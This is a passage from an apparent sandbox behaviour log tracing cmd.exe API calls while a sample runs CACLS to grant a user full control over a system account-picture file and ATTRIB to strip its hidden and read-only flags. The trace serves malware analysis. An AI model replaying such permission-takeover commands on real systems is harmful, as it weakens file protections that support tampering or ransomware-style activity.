nSize=0x2000 | out: lpBuffer="") returned 0x0 [0189.293] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0189.293] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0189.293] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0189.293] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0189.294] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0189.294] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0189.294] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0189.294] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0189.294] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0189.294] GetEnvironmentStringsW () returned 0x3a2458* [0189.294] FreeEnvironmentStringsW (penv=0x3a2458) returned 1 [0189.294] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.294] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0189.294] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0189.294] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0189.294] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0189.294] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0189.294] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0189.294] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0189.294] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0189.294] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0189.294] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af4e8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0189.294] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af4e8, lpFilePart=0x1af4e4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", 
lpFilePart=0x1af4e4*="Desktop") returned 0x18 [0189.294] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0189.294] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af264 | out: lpFindFileData=0x1af264) returned 0x3a0ae8 [0189.294] FindClose (in: hFindFile=0x3a0ae8 | out: hFindFile=0x3a0ae8) returned 1 [0189.295] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af264 | out: lpFindFileData=0x1af264) returned 0x3a0ae8 [0189.295] FindClose (in: hFindFile=0x3a0ae8 | out: hFindFile=0x3a0ae8) returned 1 [0189.295] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af264 | out: lpFindFileData=0x1af264) returned 0x3a0ae8 [0189.295] FindClose (in: hFindFile=0x3a0ae8 | out: hFindFile=0x3a0ae8) returned 1 [0189.295] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0189.295] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0189.295] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0189.295] GetEnvironmentStringsW () returned 0x3a0308* [0189.295] FreeEnvironmentStringsW (penv=0x3a0308) returned 1 [0189.295] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0189.296] GetConsoleOutputCP () returned 0x1b5 [0189.296] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0189.296] GetUserDefaultLCID () returned 0x409 [0189.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0189.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af628, cchData=128 | out: lpLCData="0") returned 2 [0189.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af628, cchData=128 | out: 
lpLCData="0") returned 2 [0189.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af628, cchData=128 | out: lpLCData="1") returned 2 [0189.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0189.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0189.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0189.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0189.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0189.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0189.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0189.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0189.296] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0189.296] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0189.296] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0189.297] GetConsoleTitleW (in: lpConsoleTitle=0x3909b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.297] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0189.297] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0189.297] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0189.298] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0189.298] 
GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0189.299] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0189.299] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0189.299] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0189.299] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0189.299] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0189.299] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0189.299] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0189.336] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0189.336] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0189.336] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0189.336] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0189.336] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0189.336] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0189.336] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0189.338] GetConsoleTitleW (in: lpConsoleTitle=0x1af2bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.339] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0189.339] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0189.339] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0189.339] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0189.339] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0189.339] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0189.339] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0189.339] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0189.339] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0189.339] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0189.339] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0189.339] _wcsicmp (_String1="CACLS", 
_String2="PAUSE") returned -13 [0189.339] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0189.339] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0189.339] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0189.339] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0189.339] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0189.339] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0189.339] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0189.339] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0189.339] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0189.339] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0189.339] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0189.339] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0189.339] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0189.339] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0189.339] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0189.339] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0189.339] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0189.339] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0189.339] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0189.339] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0189.339] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0189.339] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0189.339] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0189.339] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0189.339] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0189.339] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0189.339] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0189.339] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0189.339] _wcsicmp 
(_String1="CACLS", _String2="COLOR") returned -14 [0189.339] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0189.339] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0189.339] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0189.339] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0189.340] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0189.340] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0189.340] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0189.340] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0189.340] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0189.340] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0189.340] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0189.340] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0189.340] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0189.340] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0189.340] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0189.340] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0189.340] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0189.340] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0189.340] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0189.340] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0189.340] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0189.340] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0189.340] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0189.340] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0189.340] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0189.340] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0189.340] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0189.340] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0189.340] _wcsicmp 
(_String1="CACLS", _String2="EXIT") returned -2 [0189.340] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0189.340] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0189.340] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0189.340] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0189.340] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0189.340] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0189.340] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0189.340] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0189.340] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0189.340] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0189.340] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0189.340] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0189.340] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0189.340] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0189.340] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0189.340] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0189.340] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0189.341] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0189.341] SetErrorMode (uMode=0x0) returned 0x0 [0189.341] SetErrorMode (uMode=0x1) returned 0x0 [0189.341] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3a1e98, lpFilePart=0x1aeddc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1aeddc*="Desktop") returned 0x18 [0189.341] SetErrorMode (uMode=0x0) returned 0x1 [0189.341] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0189.341] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0189.346] GetEnvironmentVariableW (in: 
lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0189.347] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1aeb58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeb58) returned 0xffffffff [0189.347] GetLastError () returned 0x2 [0189.347] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x1aeb58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeb58) returned 0xffffffff [0189.347] GetLastError () returned 0x2 [0189.347] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1aeb58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeb58) returned 0x3a2180 [0189.347] FindClose (in: hFindFile=0x3a2180 | out: hFindFile=0x3a2180) returned 1 [0189.347] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x1aeb58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeb58) returned 0xffffffff [0189.347] GetLastError () returned 0x2 [0189.347] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x1aeb58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeb58) returned 0x3a2180 [0189.348] FindClose (in: hFindFile=0x3a2180 | out: hFindFile=0x3a2180) returned 1 [0189.348] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0189.348] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0189.348] GetConsoleTitleW (in: lpConsoleTitle=0x1af050, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.348] InitializeProcThreadAttributeList (in: lpAttributeList=0x1aeed8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1aefa0 | out: 
lpAttributeList=0x1aeed8, lpSize=0x1aefa0) returned 1 [0189.348] UpdateProcThreadAttribute (in: lpAttributeList=0x1aeed8, dwFlags=0x0, Attribute=0x60001, lpValue=0x1aef98, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1aeed8, lpPreviousValue=0x0) returned 1 [0189.348] GetStartupInfoW (in: lpStartupInfo=0x1aee94 | out: lpStartupInfo=0x1aee94*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0189.348] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0189.349] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1aef34*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1aef80 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x1aef80*(hProcess=0x50, hThread=0x4c, dwProcessId=0x88c, dwThreadId=0x9ac)) returned 1 [0189.351] CloseHandle (hObject=0x4c) returned 1 [0189.351] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 
[0189.351] GetEnvironmentStringsW () returned 0x3a0308* [0189.351] FreeEnvironmentStringsW (penv=0x3a0308) returned 1 [0189.351] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0189.515] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1aee74 | out: lpExitCode=0x1aee74*=0x0) returned 1 [0189.515] CloseHandle (hObject=0x50) returned 1 [0189.515] _vsnwprintf (in: _Buffer=0x1aefbc, _BufferCount=0x13, _Format="%08X", _ArgList=0x1aee80 | out: _Buffer="00000000") returned 8 [0189.515] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0189.515] GetEnvironmentStringsW () returned 0x3a2410* [0189.515] FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0189.515] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0189.515] GetEnvironmentStringsW () returned 0x3a2410* [0189.515] FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0189.516] DeleteProcThreadAttributeList (in: lpAttributeList=0x1aeed8 | out: lpAttributeList=0x1aeed8) [0189.516] GetConsoleTitleW (in: lpConsoleTitle=0x1af2bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.516] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0189.516] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0189.516] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0189.516] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1aeb58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeb58) returned 0xffffffff [0189.516] GetLastError () returned 0x2 [0189.516] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", 
fInfoLevelId=0x1, lpFindFileData=0x1aeb58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeb58) returned 0xffffffff [0189.517] GetLastError () returned 0x2 [0189.517] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1aeb58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeb58) returned 0x39e4d8 [0189.517] FindClose (in: hFindFile=0x39e4d8 | out: hFindFile=0x39e4d8) returned 1 [0189.517] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1aeb58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeb58) returned 0xffffffff [0189.517] GetLastError () returned 0x2 [0189.517] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1aeb58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeb58) returned 0x39e4d8 [0189.517] FindClose (in: hFindFile=0x39e4d8 | out: hFindFile=0x39e4d8) returned 1 [0189.517] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0189.517] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0189.517] GetConsoleTitleW (in: lpConsoleTitle=0x1af050, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.517] InitializeProcThreadAttributeList (in: lpAttributeList=0x1aeed8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1aefa0 | out: lpAttributeList=0x1aeed8, lpSize=0x1aefa0) returned 1 [0189.517] UpdateProcThreadAttribute (in: lpAttributeList=0x1aeed8, dwFlags=0x0, Attribute=0x60001, lpValue=0x1aef98, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1aeed8, lpPreviousValue=0x0) returned 1 [0189.517] GetStartupInfoW (in: lpStartupInfo=0x1aee94 | out: lpStartupInfo=0x1aee94*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, 
dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0189.517] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0189.518] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1aef34*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1aef80 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\"", lpProcessInformation=0x1aef80*(hProcess=0x4c, hThread=0x50, dwProcessId=0xabc, dwThreadId=0x9b8)) returned 1 [0189.519] CloseHandle (hObject=0x50) returned 1 [0189.519] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0189.519] GetEnvironmentStringsW () returned 0x3a2410* [0189.519] FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0189.519] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0189.576] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x1aee74 | out: lpExitCode=0x1aee74*=0x0) returned 1 [0189.576] CloseHandle (hObject=0x4c) returned 1 [0189.576] _vsnwprintf (in: _Buffer=0x1aefbc, _BufferCount=0x13, _Format="%08X", _ArgList=0x1aee80 | out: _Buffer="00000000") returned 8 [0189.576] 
SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0189.576] GetEnvironmentStringsW () returned 0x3a2410* [0189.576] FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0189.576] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0189.576] GetEnvironmentStringsW () returned 0x3a2410* [0189.576] FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0189.577] DeleteProcThreadAttributeList (in: lpAttributeList=0x1aeed8 | out: lpAttributeList=0x1aeed8) [0189.577] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.577] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0189.577] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.577] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0189.577] _get_osfhandle (_FileHandle=0) returned 0x3 [0189.577] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0189.577] SetConsoleInputExeNameW () returned 0x1 [0189.577] GetConsoleOutputCP () returned 0x1b5 [0189.577] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0189.577] SetThreadUILanguage (LangId=0x0) returned 0x409 [0189.577] exit (_Code=0) Process: id = "413" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16d80" os_pid = "0x88c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "412" os_parent_pid = "0x9a8" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 
